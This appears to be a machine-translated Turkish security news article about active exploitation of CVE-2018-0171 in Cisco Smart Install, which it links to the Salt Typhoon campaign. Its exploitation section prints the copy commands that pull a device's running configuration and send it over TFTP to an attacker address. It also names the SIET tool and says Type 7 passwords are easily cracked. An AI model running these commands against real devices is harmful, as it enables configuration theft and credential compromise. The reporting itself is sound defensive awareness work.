Cisco Networking ekipmanlarında yedi yaşındaki bir güvenlik açığı, saldırganların eşleştirilmemiş sistemlerde uzaktan kod yürütmesini sağlayarak önemli güvenlik riskleri oluşturmaya devam ediyor.
Başlangıçta 2018’de keşfedilen CVE-2018-0171, ağ aygıtı dağıtımını basitleştirmek için tasarlanmış bir tak ve oynatma yapılandırma yardımcı programı olan Cisco’nun Smart Install özelliğini hedefliyor.
Yaşına rağmen, son kanıtlar, bu güvenlik açığının vahşi doğada aktif olarak sömürüldüğünü ve takılmamış eski güvenlik açıklarının kalıcı tehlikesini vurguladığını göstermektedir.
.png
)
Güvenlik açığı, Cisco’nun akıllı kurulum protokolünde, tasarımın kimlik doğrulama gereksinimlerinden yoksun olan ve varsayılan olarak çok sayıda Cisco cihazında etkinleştirilen kritik bir kusurdan yararlanır.
Bu kombinasyon saldırganlar için mükemmel bir fırtına oluşturur, çünkü ilişkili hizmet genellikle internete maruz kalan TCP bağlantı noktası 4786’da çalışır.
Censys’teki son taramalar, akıllı kurulum ile 1.200’den fazla cihaz tanımladı ve dünya çapında potansiyel olarak savunmasız sistemlerin sürekli yaygınlığını gösterdi.
.webp)
ISC analistleri, güvenlik açığının saldırganların, doğrulama kontrollerini atlayan özel olarak tasarlanmış akıllı kurulum paketleri oluşturmasına izin verdiğini ve etkilenen cihazlarda yetkisiz komut yürütmesine izin verdiğini belirledi.
SANS Internet Storm Center’dan araştırmacılar, son sömürü girişimlerini analizlerinde “Bu güvenlik açığı özellikle tehlikeli olmaya devam ediyor çünkü ağ altyapısı genellikle diğer kurumsal sistemlerden daha uzun güncelleme döngüleri üzerinde çalışıyor” dedi.
Güvenlik açığı, Çin merkezli gelişmiş bir Kalıcı Tehdit (APT) aktörü olan Tuz Typhoon ile bağlantılı olduktan sonra dikkat çekti.
Bu grubun, 2024’ün sonlarında telekomünikasyon sağlayıcılarını hedefleyen bir kampanya sırasında CVE-2018-0171’den yararlandığı bildirildi.
2018’den bu yana yama mevcudiyetine rağmen, kuruluşlar savunmasız sistemleri çalıştırmaya devam ederek saldırganlara minimum sömürü çabası gerektiren hazır hedeflere sahip.
Sömürü mekanizması
Sömürü süreci, akıllı kurulum bağlantı noktasına bağlanmayı ve özel hazırlanmış komutların gönderilmesini içerir.
Smart Install Saza Aracı (Siet) gibi halka açık araçları kullanan saldırganlar, kimlik doğrulaması olmadan cihaz yapılandırmalarını ayıklayabilir.
.webp)
Saldırı genellikle 4786 bağlantı noktasına TCP bağlantılarından başlayarak belirli bir diziyi takip eder, ardından yapılandırma dosyalarını ayıklama ve aktarma komutları:-
copy system:running-config flash:/config.txt
copy flash:/config.text tftp://192.168.10.2/192.168.10.1.confBu komutlar, cihazı çalışan yapılandırmasını flaş dizinine kopyalamaya ve ardından TFTP kullanarak saldırganın makinesine aktarmaya zorlar.
TFTP temiz metin içinde çalıştığından, saldırganlar tarafından görülebilen tüm yapılandırma – şifreli şifreler de dahil olmak üzere -.
.webp)
Halka açık bir Vigenère Cipher kullanılarak şifrelenen Tip 7 şifreleri, yaygın olarak mevcut araçlar kullanılarak hemen çatlatılabilir.
Çıkarılan yapılandırmalarla saldırganlar yönetim hesaplarını, ağ düzenlerini ve güvenlik politikalarını belirleyebilir.
Bu bilgiler, şüpheli yeni hesaplar oluşturmadan veya uyarılar oluşturmadan daha fazla ağ penetrasyonunu kolaylaştırır.
Bu kırılganlığın yaşı, eski güvenlik sorunlarının modern altyapıya karşı önemli tehditler oluşturmaya nasıl devam ettiğini göstermektedir.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!